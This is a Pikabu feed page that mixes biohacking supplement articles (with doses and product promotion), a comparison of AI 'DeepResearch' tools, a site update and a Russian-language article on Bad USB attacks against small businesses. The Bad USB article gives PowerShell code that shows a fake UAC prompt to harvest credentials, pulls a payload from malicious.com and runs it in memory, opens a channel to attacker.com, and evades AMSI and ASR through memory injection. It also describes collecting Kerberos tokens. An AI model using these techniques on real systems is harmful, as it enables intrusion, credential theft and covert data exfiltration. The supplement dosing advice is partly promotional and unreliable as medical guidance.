Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Регистрируясь, я даю согласие на обработку данных и условия почтовых рассылок.
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр «Рецепт счастья» — захватывающая игра в жанре «соедини предметы»! Помогите Эмили разгадать тайну исчезновения родственника, отыскать спрятанные сокровища и вернуть к жизни её уютное кафе.

Рецепт Счастья

Казуальные, Головоломки, Новеллы

Играть

Топ прошлой недели

  • solenakrivetka solenakrivetka 7 постов
  • Animalrescueed Animalrescueed 53 поста
  • ia.panorama ia.panorama 12 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая «Подписаться», я даю согласие на обработку данных и условия почтовых рассылок.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
0 просмотренных постов скрыто
7
RiseToday
RiseToday
Серия Подборка ТОПов

ТОП-5 ОШИБОК ПРИ ПРИЕМЕ ДОБАВОК⁠⁠

15 дней назад
ТОП-5 ОШИБОК ПРИ ПРИЕМЕ ДОБАВОК

Всем привет! Биохакинг обманчиво простой: поддержка организма, все натуральное, витаминки — кажется, что навредить себе сложно. Но на практике проблемы идут не от лишней химии, а от неправильного применения. Принес вам разбор типичных биохакерских ошибок.

1. Мегадозы витаминов на всякий случай

Логика понятна: например, витамин Д — это хорошо, но 10-20 тыс МЕ в долгосрок еще лучше. К сожалению, это не так. Исследования показывают, что избыток того же витамина Д приводит к токсичности — поражение почек. История с витамином А похожа: избыток, особенно в виде ретинола, может дать токсичность вплоть до поражения печени. При этом у людей без дефицита дополнительный прием витамина А не снижает смертность и риски рака.

Я обозреваю это не для того, чтобы запугать, я хочу донести мысль: исследования показывают, что адекватное поступление витаминов, особенно при полноценном питании, действительно связано с меньшей смертностью, но просто употребление добавок не дает бонуса по выживаемости. А вот избыток некоторых добавок, как кальций, например, повышает риск смертности от рака.

2. Лечить выдуманные дефициты и игнорировать реальные

Часто вижу такие ситуации: "пью железо для энергии", "я принимаю йод для щитовидки", "у меня в стеке В12, потому что для мозга полезно". А вот реальные дефициты никто не проверял. Прием железа без дефицита повышает риск перегрузки и проблем с ЖКТ, йод на всякий случай — риск спровоцировать тиреоидит или гипертиреоз у предрасположенных, кальций без показаний — та самая история с повышенным риском смерти от рака.

Когда собираете стек, опирайтесь на лабораторную диагностику. Регулярно, хотя бы раз в 6 месяцев пересматривайте, что принимаете. Иногда достаточно поправить питание, а не закупать новые банки.

3. Опасные сочетания добавок и лекарств

Когда в стек берут кучу витаминов, обычно думают: ну, максимум не усвоится. А вот сочетание некоторых добавок с лекарствами может давать уже серьезные побочки.

Самый яркий пример — серотонинергические добавки. Многие биохакеры знают, что 5-HTP, триптофан, зверобой повышают уровень серотонина. Если поверх них человек принимает антидепрессанты, то риск серотонинового синдрома резко растет, а это может привести к тяжелым последствиям. Другие неочевидные сочетания: например, высокие дозы магния мешают усвоению некоторых групп антибиотиков.

Так что, если вы принимаете какие-либо препараты, то обсуждайте сочетаемость с добавками с врачом. Читайте в инструкции раздел с взаимодействиями.

4. Неучтенные стимуляторы в стеке

Многие уверены, что пьют мало кофе. Но кофеин содержится также в предтрене, жиросжигателях, энергетических комплексах, напитках вроде чая, энергетиков, колы.

Проблема в том, что исследования связывают высокий уровень потребления кофеина с ростом тревоги, нарушений сна, тахикардией и другими проблемами у чувствительных людей. Поэтому пересчитайте свое потребление кофеина из всех источников. Не употребляйте стимулирующие добавки во второй половине дня, если хотите не просто спать, но и высыпаться.

5. Подменять базу добавками

Самая скучная, но главная ошибка. Многие биохакеры верят, что какая-то чудесная добавка закроет их дыры в режиме: плохой сон, питание джанк фудом, некачественные или отсутствие тренировок, повышенный стресс.

Исследование показало, что сам по себе факт приема добавок не снижает смертность, важно именно адекватное поступление витаминов. Поэтому важно помнить, что стек — это не фундамент, а грамотная надстройка для сохранения здоровья и повышения качества жизни.


А еще больше интересных исследований и разборов в сообществе RISE: Ноотропы и Биохакинг в Telegram и группе в ВКонтакте. А ещё на канале ламповое общение, личный опыт участников и возможность задать вопрос и получить помощь.

Показать полностью 1
[моё] Мозг Здоровье ЗОЖ Исследования Научпоп Ошибка Помощь Биохакинг Гайд Лекарства Питание Витамины Дефицит Рак и онкология Старение Борьба со старением Сон Кофе Стресс Длиннопост
0
RiseToday
RiseToday

ТОП инфы по теме антистресс⁠⁠

21 день назад

Всем привет! Я пишу статьи про здоровье и личную эффективность: только на основе исследований и проверенной информации. Принес вам актуальную подборку по борьбе со стрессом и тревогой.

ТОП инфы по теме антистресс

Посты:

🟠Гайд по адаптогенам: как выбрать и не промахнуться?

🟠Лаванда лечит депрессию: миф или правда?

🟠Сон гения: как спит Павел Дуров?

🟠Ликбез по глицину

🟠Стресс и гиппокамп: почему хронический стресс ухудшает память?

Статьи:

🟢Осеннее обострение: гайд по феномену

🟢Как заставить мозг работать: простые дыхательные практики

🟢Как выжить в хаосе и быть продуктивным: тайм-менеджмент от топ-экспертов

🟢Как перепрошить мозг после выгорания: BDNF, стресс и мышление

🟢Психосоматика: научные основы взаимодействия психики и тела

🟢СДВГ и прокрастинация. Общие проблемы и ультимативные решения

🟢Вкусно и не грустно: влияние питания на уровень тревожности

Материалы на другие темы можно найти в моем блоге.

Промокоды от нашего сообщества биохакеров:

➡️ Получить скидку 10% на vivaherb.ru на все добавки — RISE10

➡️ Получить банку ежовика гребенчатого в подарок при заказе от 3,5к — RISE


Больше материалов про здоровье, секретов продуктивности и личной эффективности вы найдете в нашем сообществе RISE: Ноотропы и Биохакинг и группе ВКонтакте. Подписывайтесь, чтобы не пропустить свежие статьи!

Реклама.
ООО «Ноотериа Лабс»,
ОГРН 1215400008207
Erid: 2VSb5ynrvAD

Показать полностью 1
[моё] Мозг Здоровье ЗОЖ Исследования Научпоп Подборка Биология Биохакинг Что почитать? Стресс Тревога Тревожность Саморазвитие Мышление Гайд Сон Эмоциональное выгорание Сознание Продуктивность Мотивация
0
3
RiseToday
RiseToday

Осеннее обострение: гайд по феномену⁠⁠

2 месяца назад

Усталость, сонливость, тяга к сладкому, апатия, провалы мотивации – знакомая осенняя тема. Почему это возникает, и главное, как не застревать в этом состоянии? Разбираем в статье.

На связи RISE: Ноотропы и Биохакинг. Осень приносит резкое сокращение светового дня, сдвиги циркадных ритмов, изменения в серотониновой системе и сезонные иммунные сдвиги. В результате у части людей ухудшается настроение и энергия — от осенней хандры до клинического эпизода сезонной депрессии. Разберем протокол для профилактики и выхода из апатичного состояния: от практических методов до добавок.

Дисклеймер: статья носит ознакомительный характер, перед применением любых добавок необходима консультация врача. Мы за безопасный биохакинг.

Почему осень влияет на тело и психику?

Наша серотониновая система подвержена влиянию смены сезонов. В осенне зимний период увеличивается активность транспортеров серотонина, своеобразных уборщиков в системе. Уборщик забирает серотонин из синапса обратно в нейрон, что приводит к уменьшению серотонина в синапсах. Следствие: сигнал серотонина схлопывается чуть быстрее. Это проявляется сонливостью, туманом в голове, тягой к сладкому и снижением настроения. Чем больше транспортеров, тем быстрее идет уборка. По такой системе работают антидепрессанты: они блокируют работу транспортеров.

Когда день короче, мозг получает меньше утреннего света. Это сдвигает встроенные часы в гипоталамусе: В исследованиях доказали, что длительность ночной секреции мелатонина увеличивается по сравнению с летним» режимом, то есть биологическая ночь реально удлиняется. Даже обычный экран планшета поздним вечером подавляет мелатонин и сдвигает циркадную фазу.

Еще следует учесть, что осенью и зимой организм переключает ряд генетических и иммунных программ на зимний профиль. Это означает, что в крови меняется состав клеток и усиливается тонкий фон воспаления. Такой сдвиг помогает лучше бороться с инфекциями, но у части людей он связан с вялостью, сонливостью, упадком мотивации и ухудшением настроения.

Как понять, что хандра накрыла?

Обычная усталость возникает после перегруза и уходит за пару ночей нормального сна. Сезонная хандра и сезонная депрессия стартуют в одни и те же месяцы, чаще октябрь-февраль, держатся неделями и тянут за собой характерный набор: хочется спать дольше, тянет на углеводы, вес ползет вверх, туман в голове, тает желание общаться с людьми. Если эти признаки повторяются каждую осень/зиму и мешают работать, это уже не просто усталость.

На тяжесть ориентируйтесь по симптомам: если почти каждый день на протяжении 2 недель есть подавленное настроение или утрата интереса, а вместе с ними набирается еще несколько симптомов, такие как проблемы со сном, странный аппетит, необычно много или мало энергии, плохая концентрация, чувство вины и т. п, пора к специалисту. Срочная помощь нужна, если произошла резкая переключка в гиперактивность с малым сном и потоком идей – это риск биполярной фазы. Или если появились серьезные мысли о тщетности бытия, а работа и быт разваливаются.

Ниже приведу протокол помощи именно при осенней хандре, оценивать стоит на дистанции пары недель, тогда будут заметны улучшения.

Практические методы

Свет

У нас был разбор пользы светотерапии в отдельном материале. Метаанализ исследований показал, что светотерапия для пациентов с сезонным аффективным расстройством показала значительные улучшения состояния по сравнению с плацебо. 30-60 мин на улице в середине дня даже в пасмурную погоду усиливают антидепрессивный эффект света.

Циркадные ритмы

Устанавливаем строгий график сна, ложимся и встаем в одно и то же время. Если есть проблемы с засыпанием, нужно восстановить режим за пару дней, можно использовать низкие дозировки мелатонина, они более эффективны.

Движение

Метаанализ исследований показал, что силовые, йога или аэробные тренировки 3-4 раза в неделю по 30-45 минут снижают депрессивные симптомы. Физическую активность ставят на один уровень эффективности наряду с психотерапией и антидепрессантами в качестве основных методов лечения депрессии.

Питание

Начните день с белкового завтрака: аминокислоты тирозин и фенилаланин поддержат дофаминовую систему, будет легче включаться в работу и держать фокус. В течение дня делайте ставку на цельные углеводы — крупы, бобовые, корнеплоды, цельнозерновой хлеб. Они ровнее держат сахар и дают триптофан для серотонина, поэтому меньше качелей энергии и тяги к сладкому. 2-3 раза в неделю добавляйте жирную морскую рыбу, омега-3 снижают зимний воспалительный фон и поддерживают настроение. Соль, сахар и ультрапереработку ограничивайте.

Какие анализы проверить

Если чувствуете сезонный спад, начните с четырех базовых анализов:

Витамин Д.  Не гадайте по самочувствию и не пейте высокие дозы вслепую. Сдайте анализ и скорректируйте дозировку с врачом, пересмотрите уровень через 8–12 недель. Я для профилактики дефицита принимают 2000-4000 МЕ с начала осени по май, выбираю витамин Д + К2.

Железо и ферритин важны как энергия и запасы железа: даже без анемии низкий ферритин даёт усталость и туман в голове. Сдавать лучше утром натощак и не принимать железо за 48 часов до анализа. Дальше искать причину дефицита и восполнять под контролем.

B12. Дефицит часто маскируется под хандру, а корректируется просто.

ТТГ. Первый фильтр по щитовидке: при сонливости, зябкости, сухой коже, наборе веса или семейной истории начните с него. Если ТТГ вне референса, уже по показаниям добавляют свободный Т4 и антитела, и решают, нужна ли терапия.

Поддержка добавками

Омега-3

Обращайте внимание на Омегу с высокой концентрацией ЭПК. Метаанализ 15 исследований показал, что у взрослых с депрессивной симптоматикой отмечается улучшение при приеме Омега-3 с высокой концентрацией ЭПК.

Витамин Д

Свежие метаанализы показывают умеренное улучшение симптомов при депрессии. Адекватный статус Д помогает энергии и иммунной устойчивости, но избыточные дозы пользы не добавляют, поэтому лучше ориентироваться на анализы. Жирорастворимый, комбинируйте с Омегой или принимайте во время еды.

Магний

200-400 мг бисглицината магния вечером расслабляют, улучшают качество сна и снижают нервное напряжение. Я использую как ежедневную подушку безопасности при стрессе.

Б-комплекс

Ориентируйтесь при выборе на комплексы с полноценными дозировками, особенно B1, B6, B12 и фолат. Помогают переносить нагрузку и уменьшать ощущение перегрева в работе. Это не лечение депрессии, но полезная добавка для нервной системы в загруженные недели.

Для фокуса и энергии под задачи можно добавить в стек:

Кофеин + L-теанин

Например, 50-100 мг кофеина + 100-200 мг L-теанина утром, но через 2 часа после пробуждения. Работает особенно хорошо при недосыпе и длинных спринтах. Если тревожность высокая или есть проблемы со сном, то снижайте дозу или используйте только теанин.

L-тирозин

Инструмент по требованию, а не на каждый день. 500-2000 мг за 30–60 мин до нагрузки, холода или недосыпа. Может поддержать когнитивные функции в стрессе.

Родиола розовая

Экстракт 200-400 мг. Обзоры показывают снижение усталости и уровня стресса.  Эффект накопительный, через 1-2 недели заметнее. При биполярном расстройстве и на фоне стимуляторов принимать с осторожностью.

Бакопа Монье

Вариант на длинную дистанцию для памяти и обучаемости. Это не про мгновенный фокус, а про медленное улучшение когнитивной базы. Курс обычно 8-12 недель, 300-600 мг экстракта в день.

Я предпочитаю готовое решение для продуктивности, поэтому беру Майндбустер: ДМАЕ, бакопа, кофеин + L-теанин, родила и тирозин, группа витаминов В, плюс пиперин для лучшего всасывания. Преимущество в том, что не надо заморачиваться, подбирать дозировку и покупать всё по отдельности, закинул 2-3 капсулы и пошел заниматься делами. 1 банка по сути заменяет кучу других.

Моя банка Майндбустера для работы

Моя банка Майндбустера для работы

Что по итогу?

Осенняя хандра – это нормальная реакция организма на изменившийся ритм жизни. Дайте себе две недели на эксперимент: фиксированный подъем, утренний свет, днем – движение, вечер на замедление и спокойнее.  В тарелке белок на завтрак, цельные углеводы в течение дня, рыба пару раз в неделю. Если есть дефициты — корректируйте их. Если придерживаться базовых шагов, энергия и настроение постепенно вернутся.

Уже заметили осенние изменения? Как обычно поддерживаете работоспособность?


Автор статьи участник нашего сообщества Филипп. Больше интересных подборок и статей вы можете найти в нашем сообществе RISE: Ноотропы и биохакинг, а также в группе ВКонтакте. Подписывайтесь на канал и общайтесь в нашем уютном чате на разные темы о здоровье.

Показать полностью 6
[моё] ЗОЖ Здоровье Исследования Научпоп Мозг Осень Хандра Питание Работа Депрессия Биология Гайд Личный опыт Иммунитет Стресс Мотивация Саморазвитие Витамины Биохакинг Длиннопост
4
0
IgnatAI
IgnatAI

Функция DeepResearch: выбираем лучшее решение на рынке⁠⁠

4 месяца назад
Создано в Canva

Создано в Canva

Сегодня протестируем функцию "Глубокого исследования", DeepResearch, у 4-х нейросетей: ChatGPT, Perplexity, Gemini и Grok. Поймем какая нейросеть предоставляет самое качественное и лучшее решение.

В этой статье вы узнаете

  • Что такое функция DeepResearch и для чего она нужна

  • Критерии сравнения

  • Что дает ChatGPT

  • Что у Perplexity

  • Пробуем Gemini

  • Смотрим у Grok

  • Резюме


Что такое функция DeepResearch и для чего она нужна

DeepResearch — это функция, которая позволяет проводить углубленный, всесторонний анализ заданной темы. Её основная задача — собрать, обработать и синтезировать обширный объем информации из различных источников, чтобы предоставить пользователю максимально полное и детализированное представление о предмете исследования.

Мы по запросу получаем отчет с глубоким пониманием темы, выявлением скрытых взаимосвязей и тенденций. Для принятия обоснованных решений, основываясь на данных, которые иначе были бы недоступны или требовали бы значительных затрат времени и усилий при ручном сборе.

Суть: пишем свой вопрос, нейросеть уточняет детали, затем минут 10 она думает и выдает полноценный отчет-ответ с детальным освещением темы.


Критерии сравнения

Будем сравнивать 4 нейронки, имеющие эту функцию. Смотреть будем исключительно бесплатные тарифы, поскольку для большинства это будет актуальнее.

Проверять будем с помощью одного промпта, ранее уже рассказывал о нем в статье про стратегический компас, вот он:

Я хочу рассмотреть будущие тренды с целью получить преимущества в будущем, как по карьере, так и по качеству жизни в целом: стабильная работа, пассивный доход, реальные активы. Сейчас июнь 2025 года, мне 22 года, я закончил бакалавриат робототехники и пойду в магистратуру на направление инноватика, но параллельно обучаюсь программированию на языках C, в частности, C#. Также сейчас я зарабатываю фрилансом, программируя на разных биржах. В общем, я выделил перспективные на мой взгляд направления и хочу, чтобы ты их проанализировал и дал анализ касательно перспектив и возможностей в этих сферах как для меня как работника, так и для меня как инвестора. Иначе говоря, хочу, чтобы ты проанализировал направления на предмет будущей инвестиционной превлекательности: условно за какими компаниями в этих сферах нужно следить, какие технологии нужны или каких технологий не хватает, чтобы индустрия стала развиваться. Какое сырье необходимо будет использовать в индустрии. Короче говоря, мне на основе анализа нужна информация по: перспективным компаниям, перспективным металлам и иным активам, которые будут дорожать в перечисленных сферах. В идеале, если ты скажешь за чем мне следует следить и к каким активам стоит пригледеться. Сделай отдельные прогнозы на 5, 10 и 20 лет. Учитывай, что я отрезан от мировых рынков и финансовых инструментов, поэтому сейчас ожидаю выявление непосредственных трендов. И, наконец, сами направления:
- импланты (типо нейролинк и как в игре киберпанк) ИИ и инфраструктура для ИИ
- Освоение космоса, новые типы двигателей
- Робототехника и протезы
- Медицина: креокапсулы, выращивание и/или отращиваение частей тела
- Квантовые вычисление
- Технологии очистки воды
- AR, VR-гейминг
- Технологии хранения энергии
- Термоядерный синтез и атомная энергетика
- Технологии переработки пластика, углерода

Использую именно этот промпт, поскольку он отражает саму идею функции "Глубокого исследования" - анализ большого количества данных и систематизация в полноценный подробный отчет.

По ходу повествования буду давать пояснения по самим нейросетям и конкретно по DR в каждой из них.


Что дает ChatGPT

Начнем с "ксерокса" в мире нейросетей - ChatGPT. У бесплатных пользователей есть доступ к 5 запросам DeepResearch в месяц. Важно отметить, что это облегченная версия функции DeepResearch, которая использует модель o4-mini. Ответы в этой версии короче, но сохраняют глубину и качество анализа. (Эта часть написана 27 июля, до выхода GPT-5, потом сделаю апдейт)

Я пользовался Плюсом GPT и бесплатная версия в сравнении с платной очень проигрывает, но пользоваться можно. Пробуем наш запрос:

Получили уточняющие вопросы

Запустили, ждем

Запустили, ждем

Ответ дан за 8 минут:

Перейти к видео

Получилось достойно. Если бы мы делали на платной подписке, то получилось бы ещё лучше. В тексте есть ссылки на источники, все рабочие. Правда, не раскрыта часть запроса про карьеру, а так нормально.

Важно: отчеты читаем полностью и ищем подтверждение по каждой ссылке. У меня был случай, когда я искал компанию, мне GPT в отчете ее предложил, я пошел ее смотреть, а она закрыта уже как два года. Не слепо верим - проверяем.


Что у Perplexity

Следует сразу уточнить, что это неклассическая нейросеть как GPT, Grok или Claude и подобные. Это поисковая система с встроенным ИИ, которая дает информацию на основе того, что есть в интернете.

Тоже очень хороший инструмент, здесь хорошо проверять новости на существование их в интернете.

Тут нам доступно по 3 запроса в день, давайте посмотрим, на что они способны:

Здесь вопросы нейросеть задает вопросы по ходу. Смотрим на результат:

Перейти к видео

Очень коротко получилось да и не похож этот текст на полноценный отчет.

Не значит, что этой нейронкой не пользуемся теперь. Как я писал выше, она другая и задача у нее тоже иная, но DR не самый сильный, конечно.


Пробуем Gemini

На удивление данная нейросеть мало присутствует в инфополе, хотя у нее есть функции, которых нет в ChatGPT.

Здесь нам доступно 10 попыток на месяц. Разницы в качестве модели на платной и бесплатной версии тут нет, только в количестве запросов. Всё по порядку:

Вставили промпт и запускаем

Можем изменить план, если что-то не так и начинаем исследование. Только учтите, что измение плана считается как новый запрос. По опыту скажу, что план менять не придется. Если, конечно, не шляпа написана в самом запросе.

В зависимости от сложности запроса нейросеть будет работать дольше или быстрее, у меня в среднем 15 минут и более. Если исследование слетит, у меня так было в первый раз, то просто перезапустите с тем же промптом, попытка не расходуется.

По итогу мы получаем многостраничный отчет, где все подробно расписано; если пользуетесь Google-доками, то можно экспортировать текст прямо туда.


Теперь интересные фичи посмотрим) Мы на основе полученного отчета можем сделать:

  • Аудиопересказ

  • Веб-страницу

  • Инфографику (Правда, в зависимости от темы это по сути та же веб-страница)

  • Тест

Перейти к видео

Перейдем к другой полезной функции - аудиопересказу.

В статью вроде как нельзя добавить аудиофайл, поэтому прикрепиляю ссылку на сам чат Gemini: https://g.co/gemini/share/d11e4e47a232

И на последок посмотрим тест:

Для учебы очень годная функция

Если вам нужно подготовиться к экзамену, то по материалу можно порешать тест, очень удобно. Google в принципе много делает функций заточенных под анализ, исследования и самообразование. Есть инструмент - NotebookLM, тоже от гугл, нереальная имба, если что-то учите: Notebook LM: новый уровень в анализе и исследованиях


Смотрим у Grok

Grok - это очень необычная нейросеть, известная своими спичами в интернете. Разрабатывает ее компания xAI, которая принадлежит Илону Маску, а Илон в принципе человек-феномен. В общем, нейронка со своим вайбом)

По количеству запросов у бесплатных пользователей непонятки, если честно... то 3 раза за день, то 2. В любом случае, если не по кд запросы отправлять, то должно хватать.

Нам нужен DeeperSearch

Нам нужен DeeperSearch

Перейти к видео

Получилось не совсем хорошо... ссылки есть, но текст в общем написан. В конце Грок сделал таблицу, удобно; хотя я его об этом не просил, но и там местами общая информация, хотя я прописал в промпте, что мне нужны названия. Дается общее направление; в целом, можно использовать.


Резюме

Вот такой обзор получился. На данный момент мой фаворит - это Gemini; я в принципе пользуюсь ей всегда теперь, не только из-за DR. Если вы давно читаете мои статьи, то знаете как я всегда топил и гордился ChatGPT, но попробовав Gemini, я понял, что она сейчас круче. Плюс NotebookLM тоже со своими фичами, а если наложить это все на сервисы гугл, которыми я пользуюсь: документы, таблицы, то для меня AI-продукты гугл самые удобные.

Конечно, это не значит, что ChatGPT плохой, нет, я также захожу туда, чтобы сгенерировать изображение или отредактировать его, у GPT это получается лучше; как же он хорош, когда нужно удалить фон сложной фотке, чекайте:

Касаемо DR от GPT, то посмотрим ещё. Я пишу эту статью 27 июля, в начале августа; выйдет GPT-5 и, возможно, в статье появится UPD, что DR с новой моделью круче Gemini, посмотрим.

То же самое касается Grok и Perplexity; вторая вообще не LLM в классическом понимании, а поисковая система. У Грока есть много бесплатных фич, которые доступны в GPT, по Гроку, я думаю, отдельный обзор сделать.

При всем этом не будем забывать, что мы рассмотрели бесплатные версии, очевидно, что на платных тарифах лимиты больше, модели лучше (у кого что).

Контент я пишу для студентов все-таки, и для нас тут есть ложка дегтя в бочке меда: DR палится на антиплагите, поэтому его лучше не юзать при написании академических работ. Но для учебы, конкретно для подготовки к экзаменам, быстрому погружению в новую тему - очень годная вещь.

На этом у меня все, учитесь с DeepResearch, осваивайте новые инструменты и все вместе ждем GPT-5))

Благодарю за прочтение!

Показать полностью 14 4
[моё] Чат-бот ChatGPT Openai Искусственный интеллект Digital Google Программа Тренд Тестирование Гайд Сайт Gemini Perplexity Нейросеть Grok Приложение Аналитика Исследования IT Видео Без звука Короткие видео Длиннопост
0
Seberd.ITBase
Seberd.ITBase

Атака через Bad USB на малый бизнес⁠⁠

7 месяцев назад

Физический вектор атаки через эмуляцию USB HID остаётся жизнеспособным способом первичного проникновения в организации с недостаточной зрелостью процессов безопасности. Малый бизнес сохраняет уязвимость к подобным угрозам вследствие ограниченного контроля устройств, неполного охвата групповых политик и низкого уровня осведомлённости сотрудников.

<!--noindex--><a href="https://pikabu.ru/story/ataka_cherez_bad_usb_na_malyiy_biznes_12658796?u=https%3A%2F%2Ft.me%2Fscontrols&t=https%3A%2F%2Ft.me%2Fscontrols&h=bb933f90001308d324a38a5f4b2c04bb14ef3e6e" title="https://t.me/scontrols" target="_blank" rel="nofollow noopener">https://t.me/scontrols</a><!--/noindex-->

https://t.me/scontrols

Хотите разбирать реальные случаи взломов и разбираться в киберугрозах? В своём Telegram-канале https://t.me/scontrols я делюсь историями атак, методами защиты и разбором уязвимостей. Подписывайтесь, если тема безопасности вам интересна.

Подготовка устройства Bad USB включает использование плат на базе микроконтроллеров с поддержкой HID (например, Arduino Pro Micro на ATmega32U4 или Digispark на ATtiny85). Для повышения реалистичности возможна модификация идентификаторов производителя и устройства (VID/PID) через прошивку EEPROM или изменение загрузчика с помощью внешнего программатора. Популярная практика включает эмуляцию моделей известных брендов периферии, чтобы избежать подозрений на этапе подключения.

На уровне прошивки реализуется сценарий автоматического ввода команд. Стандартный набор команд Arduino использует методы Keyboard.press(), Keyboard.print() и Keyboard.releaseAll(), что позволяет симулировать комбинации клавиш, необходимые для вызова окна «Выполнить» и запуска PowerShell в пользовательском контексте. В системах Windows 11 при стандартных настройках UAC выполнение команд от имени администратора без прямого подтверждения невозможно. Поэтому сценарий нацелен на выполнение команд от имени текущего пользователя, без явного повышения привилегий.

Сценарии с попыткой автоматизации нажатий Ctrl+Shift+Enter и Alt+Y для обхода UAC работают крайне нестабильно, поскольку Windows требует подтверждения через ввод учётных данных при наличии активной политики Secure Desktop.

Для повышения вероятности успешного повышения привилегий возможно применение социальной инженерии в виде поддельного окна UAC. Скрипт создаёт имитацию системного диалога, визуально идентичного стандартному UAC, с предложением ввести административные учётные данные. Пример кода на PowerShell для создания поддельного окна:

Add-Type -AssemblyName PresentationFramework $credential = [System.Windows.MessageBox]::Show('Windows needs your permission to continue.', 'User Account Control', 'OKCancel', 'Warning') if ($credential -eq 'OK') { Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "payload"' -Verb RunAs }

Для повышения реалистичности используется создание полноэкранной формы с блокировкой действий пользователя до ввода данных, после чего происходит передача введённой информации на внешний сервер или локальное её использование для немедленного повышения привилегий.

Первоначальный скрипт PowerShell должен быть минималистичным, способным к быстрой инъекции полезной нагрузки без необходимости записи файлов на диск. Для обхода AMSI и EDR предпочтительно использовать прямую загрузку полезной нагрузки в память процесса через Memory Injection.

Загрузка полезной нагрузки из сети реализуется через COM-объект WinHttp:

$webclient = New-Object -ComObject "WinHttp.WinHttpRequest.5.1" $webclient.Open("GET", "https://malicious.com/payload.bin", $false) $webclient.Send() $bytes = $webclient.ResponseBody $assembly = [System.Reflection.Assembly]::Load($bytes) $entryPoint = $assembly.EntryPoint $entryPoint.Invoke($null, @(,$null))

Этот подход позволяет загрузить исполняемый код напрямую в память, минуя файловую систему, что снижает вероятность обнаружения средствами антивирусной защиты и системами мониторинга активности на диске.

Для обратного подключения к системе управления атаками предпочтительно использовать реверсивное соединение через HTTPS-туннелирование. Прямые соединения по нестандартным портам часто блокируются NGFW и системами анализа сетевого трафика. Туннелирование через HTTPS позволяет замаскировать соединение под стандартный веб-трафик.

Создание HTTPS-туннеля может быть реализовано через встроенный в PowerShell модуль System.Net.HttpWebRequest:

$uri = "https://attacker.com/reverse" $request = [System.Net.HttpWebRequest]::Create($uri) $request.Method = "POST" $request.ContentType = "application/octet-stream" $stream = $request.GetRequestStream() while ($true) { $input = Read-Host $bytes = [System.Text.Encoding]::UTF8.GetBytes($input) $stream.Write($bytes, 0, $bytes.Length) $stream.Flush() }

В более продвинутых вариантах атаки создаётся сессионное соединение через WebSocket поверх HTTPS, что значительно усложняет обнаружение на уровне сетевых сигнатур.

Эксфильтрация данных через такие туннели маскируется под обычную активность HTTPS-сессий, что позволяет обойти системы DLP и NGFW, настроенные на анализ приложений по портам. В ряде случаев дополнительно применяется шифрование содержимого сессии на уровне прикладного протокола, чтобы усложнить инспекцию трафика.

Подключение устройства Bad USB пользователем остаётся непредсказуемым этапом атаки. Реальные исследования демонстрируют, что вероятность подключения найденного устройства в корпоративной среде варьируется от 10% до 20%. Этот показатель возрастает при наличии провоцирующих факторов вроде маркировки накопителя корпоративной символикой или намёка на ценную информацию.

Современные системы защиты, включая Microsoft Defender for Endpoint, CrowdStrike Falcon и SentinelOne, активно мониторят поведенческие индикаторы атаки: необычные цепочки процессов, аномальные сетевые активности, взаимодействия PowerShell с COM-объектами. Даже в случае успешного обхода AMSI вероятность обнаружения на этапе эксплуатации остаётся высокой при наличии правильно настроенных политик и оперативной облачной аналитики.

Техники Post-Exploitation в рамках Bad USB-атак в 2025 году опираются на быстрый переход к боковому перемещению и сбору ключевых артефактов, минимизируя шум в сети. Используются подходы инъекции шеллов в доверенные процессы через API NtCreateThreadEx, эксплуатации служебных интерфейсов COM для выполнения команд от имени системных служб, временного создания задач через Task Scheduler с последующим их удалением для достижения постоянства, захвата токенов привилегированных процессов через DuplicateTokenEx и имплантации в текущую сессию.

Обход защиты на этапе Post-Exploitation требует дополнительного внимания к механизмам Attack Surface Reduction (ASR), встроенным в Microsoft Defender for Endpoint 2025 года. Правила ASR активно блокируют запуск исполняемых файлов через Office-документы, автозагрузку через скрипты и несанкционированные изменения системных настроек. Для их обхода применяется модификация методов доставки полезной нагрузки. Скрипты внедряются через легитимные процессы, например, через taskhostw.exe или wsmprovhost.exe, с последующей загрузкой модулей в память через API VirtualAlloc и NtProtectVirtualMemory.

Пример скрипта обхода ASR с Memory Injection:

$bytes = [System.Convert]::FromBase64String("<payload_base64>") $ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length) [System.Runtime.InteropServices.Marshal]::Copy($bytes, 0, $ptr, $bytes.Length) $func = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, (New-Object System.Func[IntPtr, Int32])) $func.Invoke($ptr)

На следующем этапе может быть инициирован сбор Kerberos-токенов для последующего горизонтального перемещения по сети. Сбор осуществляется через вызовы методов LsaEnumerateLogonSessions и LsaGetLogonSessionData, позволяя получить действующие токены пользователей без необходимости их перехвата на сетевом уровне.

Обнаружение кейлоггеров и вредоносных агентов в малом бизнесе зависит от уровня зрелости инфраструктуры безопасности. Продвинутые резидентные кейлоггеры, внедрённые через Memory Injection и маскирующиеся под системные службы, могут оставаться незамеченными в течение нескольких суток при отсутствии EDR с поведенческим анализом.

Подведение итогов успешности всей цепочки атаки требует учёта множества факторов. Без строгих политик безопасности вероятность успешного проникновения и сбора информации оценивается на умеренном уровне. При наличии современных средств защиты вероятность успешной эксфильтрации и скрытого присутствия существенно снижается.

Показать полностью 1
Статья Развитие Информационная безопасность Программа Исследования Гайд Тренд Тестирование Arduino IT Telegram (ссылка) Длиннопост
1
tablepedia

Продолжение поста «Концепция сайта-десятистраничника с PDF файлами»⁠⁠9

9 месяцев назад

Я обновил сайт https://www.tablepedia.com/

Закончил работу над проектом "Генерация HTML файлов с помощью табличного редактора".
Теперь внутри архива сайта, который можно скачать по адресу https://www.tablepedia.com/tablepedia.com-2025_03_01.zip , есть табличный файл для Excel (XLS), а также ODS, который используется в OpenOffice.org Calc и других программах электронных таблиц.
